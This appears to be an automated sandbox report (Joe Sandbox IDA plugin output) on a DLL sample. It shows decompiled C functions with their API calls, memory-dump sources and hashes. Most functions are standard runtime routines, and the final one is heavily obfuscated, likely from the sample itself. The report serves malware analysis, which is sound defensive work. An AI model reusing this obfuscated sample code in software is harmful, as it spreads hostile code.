            • Instruction ID: 4500fdd40326e61316916a76484da3a45bc343e0338b3917c43096f6e4ba33a9
            • Opcode Fuzzy Hash: 03a1104c5bd03d2d4055a77696c54d7c90657510467734026d2d4be7f235ba05
            • Instruction Fuzzy Hash: 23E105B26087459FD725CF68C884E9BB7E9FB88304F048A6EE59AC7250D734E944CF52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E6D5103C3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
            				signed int _v8;
            				int _v12;
            				char _v16;
            				intOrPtr _v24;
            				char _v28;
            				void* _v40;
            				signed int _t34;
            				signed int _t40;
            				int _t46;
            				int _t53;
            				void* _t55;
            				int _t57;
            				signed int _t63;
            				int _t67;
            				short* _t69;
            				signed int _t70;
            				short* _t71;
            
            				_t34 =  *0x6d55ce08; // 0xc2f81198
            				_v8 = _t34 ^ _t70;
            				E6D50B580(__ebx,  &_v28, __edx, _a4);
            				_t57 = _a24;
            				if(_t57 == 0) {
            					_t53 =  *(_v24 + 8);
            					_t57 = _t53;
            					_a24 = _t53;
            				}
            				_t67 = 0;
            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
            				_v12 = _t40;
            				if(_t40 == 0) {
            					L15:
            					if(_v16 != 0) {
            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
            					}
            					return E6D508B95(_v8 ^ _t70);
            				}
            				_t55 = _t40 + _t40;
            				_t17 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				if((_t17 & _t40) == 0) {
            					_t69 = 0;
            					L11:
            					if(_t69 != 0) {
            						E6D509250(_t67, _t69, _t67, _t55);
            						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
            						if(_t46 != 0) {
            							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
            						}
            					}
            					L14:
            					E6D5104E0(_t69);
            					goto L15;
            				}
            				_t20 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				_t48 = _t40 & _t20;
            				_t21 = _t55 + 8; // 0x8
            				_t63 = _t21;
            				if((_t40 & _t20) > 0x400) {
            					asm("sbb eax, eax");
            					_t69 = E6D50B438(_t63, _t48 & _t63);
            					if(_t69 == 0) {
            						goto L14;
            					}
            					 *_t69 = 0xdddd;
            					L9:
            					_t69 =  &(_t69[4]);
            					goto L11;
            				}
            				asm("sbb eax, eax");
            				E6D513490();
            				_t69 = _t71;
            				if(_t69 == 0) {
            					goto L14;
            				}
            				 *_t69 = 0xcccc;
            				goto L9;
            			}




















            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,6D50DAF1,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6D510410
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D510499
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D5104AB
            • __freea.LIBCMT ref: 6D5104B4
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ByteCharMultiWide$AllocHeapStringType__freea
            • String ID:
            • API String ID: 573072132-0
            • Opcode ID: 86144a8a7f9a1a338337e632a2b87417814e03e44f2811e709a257b601f73315
            • Instruction ID: ef0240e1946353bac50c743b73a3b02e0c797ecb1fa255f66c55e96db10a9baa
            • Opcode Fuzzy Hash: 86144a8a7f9a1a338337e632a2b87417814e03e44f2811e709a257b601f73315
            • Instruction Fuzzy Hash: 3731D072A0421AABEF199F6ACCC0EBE3BB5EB41310F054529EC14D6650E779CD64CB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E6D50DCAB() {
            				int _v8;
            				void* __ecx;
            				void* _t6;
            				int _t7;
            				char* _t13;
            				int _t17;
            				void* _t19;
            				char* _t25;
            				WCHAR* _t27;
            
            				_t27 = GetEnvironmentStringsW();
            				if(_t27 == 0) {
            					L7:
            					_t13 = 0;
            				} else {
            					_t6 = E6D50DC74(_t27);
            					_pop(_t19);
            					_t17 = _t6 - _t27 >> 1;
            					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
            					_v8 = _t7;
            					if(_t7 == 0) {
            						goto L7;
            					} else {
            						_t25 = E6D50B438(_t19, _t7);
            						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
            							_t13 = 0;
            						} else {
            							_t13 = _t25;
            							_t25 = 0;
            						}
            						E6D50B3FE(_t25);
            					}
            				}
            				if(_t27 != 0) {
            					FreeEnvironmentStringsW(_t27);
            				}
            				return _t13;
            			}












            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 6D50DCB4
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D50DCD7
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6D50DCFD
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D50DD1F
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap
            • String ID:
            • API String ID: 1993637811-0
            • Opcode ID: 1013eba4e5562f3d8dfc814a58c35e6665841e7185b3ecc7bb528578234fffd5
            • Instruction ID: 0810b439916e4b646fc2f827997c8d2e57cf25fd2439668f7fa243db4e915aac
            • Opcode Fuzzy Hash: 1013eba4e5562f3d8dfc814a58c35e6665841e7185b3ecc7bb528578234fffd5
            • Instruction Fuzzy Hash: 3E01D8776016177B6B1556BA5C8CD7B2A7DDFC7A91316011EF924C3E00EB608D0181F0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E6D50CA59(signed int _a4) {
            				signed int _t9;
            				void* _t13;
            				signed int _t15;
            				WCHAR* _t22;
            				signed int _t24;
            				signed int* _t25;
            				void* _t27;
            
            				_t9 = _a4;
            				_t25 = 0x6d55dc90 + _t9 * 4;
            				_t24 =  *_t25;
            				if(_t24 == 0) {
            					_t22 =  *(0x6d539670 + _t9 * 4);
            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
            					if(_t27 != 0) {
            						L8:
            						 *_t25 = _t27;
            						if( *_t25 != 0) {
            							FreeLibrary(_t27);
            						}
            						_t13 = _t27;
            						L11:
            						return _t13;
            					}
            					_t15 = GetLastError();
            					if(_t15 != 0x57) {
            						_t27 = 0;
            					} else {
            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
            						_t27 = _t15;
            					}
            					if(_t27 != 0) {
            						goto L8;
            					} else {
            						 *_t25 = _t15 | 0xffffffff;
            						_t13 = 0;
            						goto L11;
            					}
            				}
            				_t4 = _t24 + 1; // 0xc2f81199
            				asm("sbb eax, eax");
            				return  ~_t4 & _t24;
            			}











            APIs
            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId), ref: 6D50CA8B
            • GetLastError.KERNEL32(?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId,6D539B48,GetCurrentPackageId,00000000), ref: 6D50CA97
            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId,6D539B48,GetCurrentPackageId,00000000), ref: 6D50CAA5
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: b3305a36941746b9fbdf43aaec4aa69123dbd6b33dc5709246f5686035d6fb43
            • Instruction ID: 86a01d814bd3c7a38d2acc67e006ba4d0be947cb9d37a03154583fbf8b7eb709
            • Opcode Fuzzy Hash: b3305a36941746b9fbdf43aaec4aa69123dbd6b33dc5709246f5686035d6fb43
            • Instruction Fuzzy Hash: 1101A736656223AFCF26DA788C45B6677B8AF477617164E21F926D7A40D720D800C6F0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E6D50C854(void* __ebx, void* __ecx, void* __edx) {
            				void* __edi;
            				void* __esi;
            				intOrPtr _t2;
            				void* _t3;
            				void* _t4;
            				intOrPtr _t9;
            				void* _t11;
            				void* _t20;
            				void* _t21;
            				void* _t23;
            				void* _t25;
            				void* _t27;
            				void* _t29;
            				void* _t31;
            				void* _t32;
            				long _t36;
            				long _t37;
            				void* _t40;
            
            				_t29 = __edx;
            				_t23 = __ecx;
            				_t20 = __ebx;
            				_t36 = GetLastError();
            				_t2 =  *0x6d55ce4c; // 0x4
            				_t42 = _t2 - 0xffffffff;
            				if(_t2 == 0xffffffff) {
            					L2:
            					_t3 = E6D50B523(_t23, 1, 0x364);
            					_t31 = _t3;
            					_pop(_t25);
            					if(_t31 != 0) {
            						_t4 = E6D50CC4A(_t25, _t36, __eflags,  *0x6d55ce4c, _t31);
            						__eflags = _t4;
            						if(_t4 != 0) {
            							E6D50C69A(_t25, _t31, 0x6d55dfbc);
            							E6D50B3FE(0);
            							_t40 = _t40 + 0xc;
            							__eflags = _t31;
            							if(_t31 == 0) {
            								goto L9;
            							} else {
            								goto L8;
            							}
            						} else {
            							_push(_t31);
            							goto L4;
            						}
            					} else {
            						_push(_t3);
            						L4:
            						E6D50B3FE();
            						_pop(_t25);
            						L9:
            						SetLastError(_t36);
            						E6D50B4E0(_t20, _t29, _t31, _t36);
            						asm("int3");
            						_push(_t20);
            						_push(_t36);
            						_push(_t31);
            						_t37 = GetLastError();
            						_t21 = 0;
            						_t9 =  *0x6d55ce4c; // 0x4
            						_t45 = _t9 - 0xffffffff;
            						if(_t9 == 0xffffffff) {
            							L12:
            							_t32 = E6D50B523(_t25, 1, 0x364);
            							_pop(_t27);
            							if(_t32 != 0) {
            								_t11 = E6D50CC4A(_t27, _t37, __eflags,  *0x6d55ce4c, _t32);
            								__eflags = _t11;
            								if(_t11 != 0) {
            									E6D50C69A(_t27, _t32, 0x6d55dfbc);
            									E6D50B3FE(_t21);
            									__eflags = _t32;
            									if(_t32 != 0) {
            										goto L19;
            									} else {
            										goto L18;
            									}
            								} else {
            									_push(_t32);
            									goto L14;
            								}
            							} else {
            								_push(_t21);
            								L14:
            								E6D50B3FE();
            								L18:
            								SetLastError(_t37);
            							}
            						} else {
            							_t32 = E6D50CBF4(_t25, _t37, _t45, _t9);
            							if(_t32 != 0) {
            								L19:
            								SetLastError(_t37);
            								_t21 = _t32;
            							} else {
            								goto L12;
            							}
            						}
            						return _t21;
            					}
            				} else {
            					_t31 = E6D50CBF4(_t23, _t36, _t42, _t2);
            					if(_t31 != 0) {
            						L8:
            						SetLastError(_t36);
            						return _t31;
            					} else {
            						goto L2;
            					}
            				}
            			}






















            APIs
            • GetLastError.KERNEL32(?,7FFFFFFF,6D50B5BE,7FFFFFFF,?,?,6D50F735,00000000,-00000002,00000000,00000000,?), ref: 6D50C858
            • SetLastError.KERNEL32(00000000,-00000002,00000000,00000000,?), ref: 6D50C8C0
            • SetLastError.KERNEL32(00000000,-00000002,00000000,00000000,?), ref: 6D50C8CC
            • _abort.LIBCMT ref: 6D50C8D2
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 1f78ff8c2d104d5b51eff98f0432aa089da0e76db7a6450d8762cab110147323
            • Instruction ID: 43e23305d1d31deae87f778f7f32cb5f55ae3ed74ba9a86c315b4dcaaab53626
            • Opcode Fuzzy Hash: 1f78ff8c2d104d5b51eff98f0432aa089da0e76db7a6450d8762cab110147323
            • Instruction Fuzzy Hash: 89F0A436548A0227DB1F63389C46B7A2739AFC3765F274934FA38A6E90FF60C8014138
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E6D509556() {
            				void* _t4;
            				void* _t8;
            
            				E6D509BB7();
            				E6D509B4B();
            				if(E6D509871() != 0) {
            					_t4 = E6D509823(_t8, __eflags);
            					__eflags = _t4;
            					if(_t4 != 0) {
            						return 1;
            					} else {
            						E6D5098AD();
            						goto L1;
            					}
            				} else {
            					L1:
            					return 0;
            				}
            			}






            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 6D509556
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 6D50955B
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 6D509560
              • Part of subcall function 6D509871: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 6D509882
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6D509575
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 01f7b16c400fcf307e9578c73aa797bece4769187de86bf5317350189038e6d2
            • Instruction ID: d90614ca0d015046cab73c324254a7e9ee5ac060ac4e7626a7eca5fafead8629
            • Opcode Fuzzy Hash: 01f7b16c400fcf307e9578c73aa797bece4769187de86bf5317350189038e6d2
            • Instruction Fuzzy Hash: 9BC04C5814C252501C4C6AB2726019D93141FE2A9CF8F58C1CBC157F4D8F06880A2C73
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E6D518F63() {
            				signed int _t307;
            				intOrPtr _t323;
            				signed int _t333;
            				intOrPtr _t337;
            				signed int _t376;
            				intOrPtr _t399;
            				signed int _t421;
            				intOrPtr* _t425;
            				void* _t426;
            				void* _t427;
            
            				_t337 =  *0x6d540000; // 0xb0b7c8
            				 *_t425 = _t337;
            				 *((intOrPtr*)(_t337 + 0x1d8)) =  *((intOrPtr*)(_t425 + 0x4c));
            				 *((intOrPtr*)(_t425 + 0x14)) = 0x2872;
            				 *((intOrPtr*)(_t425 + 0xc)) = 0x29d1;
            				 *((intOrPtr*)(_t425 + 0x20)) = 0x1df3;
            				 *((intOrPtr*)(_t425 + 0x28)) = 0;
            				 *((intOrPtr*)(_t425 + 0x10)) = 0x1e7b;
            				 *((intOrPtr*)(_t425 + 0x18)) = 0x1eee;
            				 *((intOrPtr*)(_t425 + 0x50)) = 0x260d;
            				 *((intOrPtr*)(_t425 + 0x24)) = 0x24ad;
            				 *((intOrPtr*)(_t425 + 0x2c)) = 0x29d1;
            				 *((intOrPtr*)(_t425 + 0x1c)) = 0x29b2;
            				 *((intOrPtr*)(_t425 + 0xc)) = 0;
            				 *((intOrPtr*)(_t425 + 0x3c)) =  *((intOrPtr*)(_t425 + 0x14)) + 0x9f7;
            				 *((intOrPtr*)(_t425 + 0x18)) =  *((intOrPtr*)(_t425 + 0x5c)) - 0x71f;
            				_push( *((intOrPtr*)(_t425 + 0x24)) + 0x2fb);
            				_push( *((intOrPtr*)(_t425 + 0x34)) + 0x2749);
            				_push( *((intOrPtr*)(_t425 + 0x20)) - 0x984);
            				_push( *((intOrPtr*)(_t425 + 0x30)) + 0x7e3);
            				_push( *((intOrPtr*)(_t425 + 0x14)) + 0x1df3);
            				_push( *((intOrPtr*)(_t425 + 0x28)) - 0x140);
            				_push( *((intOrPtr*)(_t425 + 0x28)));
            				_push( *((intOrPtr*)(_t425 + 0x1c)) + 0xe15);
            				_push( *((intOrPtr*)(_t425 + 0x38)));
            				_push( *((intOrPtr*)(_t425 + 0x60)));
            				 *((intOrPtr*)(_t425 + 0x40)) = E6D506FC7();
            				 *((intOrPtr*)(_t425 + 0x54)) =  *((intOrPtr*)(_t425 + 0x54)) + 0x10b2;
            				 *((intOrPtr*)(_t425 + 0x40)) =  *((intOrPtr*)(_t425 + 0x40)) + 0x606;
            				 *((intOrPtr*)(_t425 + 0x64)) =  *((intOrPtr*)(_t425 + 0x44)) + 0xb56;
            				_push( *((intOrPtr*)(_t425 + 0x58)) - 0x6ba);
            				_push( *((intOrPtr*)(_t425 + 0x50)) - 0xb37);
            				_push( *((intOrPtr*)(_t425 + 0x48)) - 0x9f7);
            				_push( *((intOrPtr*)(_t425 + 0x4c)) - 0x73);
            				_t399 =  *((intOrPtr*)(_t425 + 0x48));
            				_push( *((intOrPtr*)(_t425 + 0x5c)) + 0x2597);
            				_push(_t399);
            				_push( *((intOrPtr*)(_t425 + 0x5c)) + 0x2872);
            				_push( *((intOrPtr*)(_t425 + 0x58)) + 0x524);
            				_push( *((intOrPtr*)(_t425 + 0x84)));
            				 *((intOrPtr*)(_t425 + 0x70)) = E6D50768E();
            				_t426 = _t425 + 0x4c;
            				 *((intOrPtr*)(_t399 + 0x8c)) =  *((intOrPtr*)(_t399 + 0x1f4));
            				 *((intOrPtr*)(_t426 + 0x20)) =  *((intOrPtr*)(_t426 + 0x20)) + 0x140;
            				 *((intOrPtr*)(_t426 + 0x54)) =  *((intOrPtr*)(_t426 + 0x14)) + 0x28a4;
            				_push( *((intOrPtr*)(_t426 + 0x10)));
            				 *((intOrPtr*)(_t426 + 0x54)) =  *((intOrPtr*)(_t426 + 0x20)) + 0x101;
            				 *((intOrPtr*)(_t426 + 0x50)) =  *((intOrPtr*)(_t426 + 0x18)) + 0x2ea5;
            				 *((intOrPtr*)(_t426 + 0x4c)) =  *((intOrPtr*)(_t426 + 0x2c)) + 0x111;
            				 *((intOrPtr*)(_t426 + 0x48)) =  *((intOrPtr*)(_t426 + 0x20)) + 0xb37;
            				 *((intOrPtr*)(_t426 + 0x44)) =  *((intOrPtr*)(_t426 + 0x28)) + 0x8ce;
            				 *((intOrPtr*)(_t426 + 0x40)) =  *((intOrPtr*)(_t426 + 0x60)) + 0x898;
            				_push( *((intOrPtr*)(_t426 + 0x18)) + 0x1e7b);
            				_push( *((intOrPtr*)(_t426 + 0x30)) - 0x10b2);
            				_push( *((intOrPtr*)(_t426 + 0x28)) + 0x102a);
            				_push( *((intOrPtr*)(_t426 + 0x34)) - 0x632);
            				_push( *((intOrPtr*)(_t426 + 0x38)) + 0x1df3);
            				_push( *((intOrPtr*)(_t426 + 0x24)));
            				_push( *((intOrPtr*)(_t426 + 0x3c)));
            				_push( *((intOrPtr*)(_t426 + 0x5c)));
            				_push( *((intOrPtr*)(_t426 + 0x64)));
            				_push( *((intOrPtr*)(_t426 + 0x6c)));
            				_push( *((intOrPtr*)(_t426 + 0x74)));
            				_push( *((intOrPtr*)(_t426 + 0x7c)));
            				_push( *((intOrPtr*)(_t426 + 0x84)));
            				_push( *((intOrPtr*)(_t426 + 0x8c)));
            				 *((intOrPtr*)(_t426 + 0x98)) = E6D502AE5();
            				 *((intOrPtr*)(_t426 + 0x7c)) =  *((intOrPtr*)(_t426 + 0x64)) + 0x4f3;
            				 *((intOrPtr*)(_t426 + 0x80)) =  *((intOrPtr*)(_t426 + 0x54)) - 0xbc5;
            				 *((intOrPtr*)(_t426 + 0x84)) =  *((intOrPtr*)(_t426 + 0x54)) - 0xcc0;
            				 *((intOrPtr*)(_t426 + 0x88)) =  *((intOrPtr*)(_t426 + 0x64)) - 0x505;
            				 *((intOrPtr*)(_t426 + 0x8c)) =  *((intOrPtr*)(_t426 + 0x70)) + 0x2b78;
            				_push( *((intOrPtr*)(_t426 + 0x4c)));
            				_push( *((intOrPtr*)(_t426 + 0x70)) - 0x632);
            				_push( *((intOrPtr*)(_t426 + 0x68)) + 0x4f3);
            				_push( *((intOrPtr*)(_t426 + 0x68)) - 0x505);
            				_push( *((intOrPtr*)(_t426 + 0x98)) - 0xab1);
            				_push( *((intOrPtr*)(_t426 + 0x98)) - 0x6bb);
            				_push( *((intOrPtr*)(_t426 + 0x70)) + 0x1df3);
            				_push( *((intOrPtr*)(_t426 + 0x5c)) - 0xb37);
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				_push( *((intOrPtr*)(_t426 + 0xac)));
            				 *((intOrPtr*)(_t426 + 0x98)) = E6D50391B();
            				_t427 = _t426 + 0x70;
            				if( *(_t427 + 0x14) >=  *(_t427 + 0x1c) + 0x9f7) {
            					L3:
            					_t376 =  *(_t427 + 0x10);
            					L4:
            					return  *((intOrPtr*)(_t376 + 0x15c));
            				}
            				if( *(_t427 + 0x14) >=  *(_t427 + 0x18) + 0xfffffa7b) {
            					_t333 =  *(_t427 + 0x20);
            					 *(_t427 + 0x38) = _t333;
            					if(_t333 ==  *((intOrPtr*)(_t427 + 0x24)) -  *(_t427 + 0x1c)) {
            						goto L3;
            					}
            					_t376 =  *(_t427 + 0x10);
            					do {
            						if( *(_t427 + 0x20) < ( *(_t427 + 0x1c) & 0x00002c90)) {
            							 *((intOrPtr*)(_t427 + 0x3c)) =  *((intOrPtr*)(_t376 + 0x104)) -  *((intOrPtr*)(_t427 + 0x24));
            							 *(_t427 + 0x40) = ( *(_t376 + 0x1d4) | 0x00002872) ^ 0x000024ad;
            							 *(_t427 + 0x44) =  *(_t427 + 0x5c) *  *(_t376 + 0xe8);
            							 *(_t427 + 0x48) =  *(_t376 + 0x74) & 0x00002749;
            							 *(_t427 + 0x50) =  *(_t427 + 0x14) +  *(_t427 + 0x5c);
            							 *((intOrPtr*)(_t427 + 0x4c)) =  *(_t427 + 0x14) -  *((intOrPtr*)(_t376 + 0x90)) -  *(_t427 + 0x30);
            							 *((intOrPtr*)(_t427 + 0x54)) =  *(_t427 + 0x14) + ( *(_t427 + 0x14) ^  *(_t427 + 0x5c));
            							_t421 =  *(_t427 + 0x10);
            							_push( *( *(_t427 + 0x10) + 0x13c) &  *(_t421 + 0x1d4));
            							_push(( *(_t427 + 0x1c) ^ 0x00000a68) & 0x00001eee);
            							_push( *(_t427 + 0x18) * 0x2749);
            							_push(( *(_t376 + 0x17c) &  *(_t376 + 0xd8)) - 0x1eee);
            							_push(_t421);
            							_push( *(_t427 + 0x18) +  *((intOrPtr*)(_t427 + 0x24)) +  *(_t376 + 0xd4));
            							_push(( *(_t376 + 8) | 0x000029d1) * 0x2597);
            							_push( *((intOrPtr*)(_t427 + 0x68)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_push( *((intOrPtr*)(_t427 + 0x70)));
            							_t307 = E6D515588();
            							_t376 =  *(_t427 + 0x48);
            							_t427 = _t427 + 0x38;
            							_t333 =  *(_t427 + 0x38);
            							 *(_t427 + 0x34) = _t307;
            						}
            						_t333 = _t333 + 3;
            						 *(_t427 + 0x5c) =  *(_t427 + 0x5c) + ( *(_t427 + 0x5c) &  *(_t376 + 0xd4)) -  *((intOrPtr*)(_t376 + 0x90));
            						 *(_t427 + 0x38) = _t333;
            						 *(_t427 + 0x2c) =  *(_t427 + 0x2c) ^ ( *(_t376 + 0x148) & 0x000028a4) + 0x00002ac3;
            						 *(_t427 + 0x30) =  *(_t427 + 0x30) ^  *(_t427 + 0x1c) +  *(_t427 + 0x20) *  *(_t376 + 0x1d4);
            						 *(_t376 + 0x1d4) =  *(_t376 + 0x1d4) + ( *(_t376 + 0x158) & 0x000029d1);
            						 *(_t376 + 0x80) =  *(_t376 + 0x80) ^  *(_t427 + 0x14) * ( *(_t427 + 0x5c) -  *(_t427 + 0x30));
            						 *(_t376 + 0x80) =  *(_t376 + 0x80) -  *(_t427 + 0x34) * ( *(_t376 + 0x1c) ^  *(_t376 + 0x130));
            					} while (_t333 !=  *((intOrPtr*)(_t427 + 0x24)) -  *(_t427 + 0x1c));
            					goto L4;
            				}
            				 *((intOrPtr*)(_t427 + 0x3c)) =  *(_t427 + 0x2c) - 0xcbc;
            				 *(_t427 + 0x40) =  *(_t427 + 0x18) - 0x606;
            				 *(_t427 + 0x44) =  *(_t427 + 0x18) - 0xc38;
            				 *(_t427 + 0x48) =  *(_t427 + 0x14) + 0x2ab3;
            				 *((intOrPtr*)(_t427 + 0x4c)) =  *(_t427 + 0x34) + 0x2c90;
            				 *(_t427 + 0x50) =  *(_t427 + 0x1c);
            				 *((intOrPtr*)(_t427 + 0x54)) =  *((intOrPtr*)(_t427 + 0x28)) - 0x2c4;
            				_push( *(_t427 + 0x2c) - 0x102a);
            				_push( *(_t427 + 0x2c) - 0x977);
            				_push( *(_t427 + 0x5c) - 0x32);
            				_push( *(_t427 + 0x38) - 0x7e8);
            				_push( *(_t427 + 0x2c) - 0x3f2);
            				_push( *(_t427 + 0x18) - 0xcc0);
            				_push( *(_t427 + 0x5c) + 0x12d);
            				_push( *(_t427 + 0x2c));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_push( *((intOrPtr*)(_t427 + 0x74)));
            				_t323 = E6D5173B5();
            				_t427 = _t427 + 0x3c;
            				 *((intOrPtr*)(_t427 + 0x24)) = _t323;
            				goto L3;
            			}














            APIs
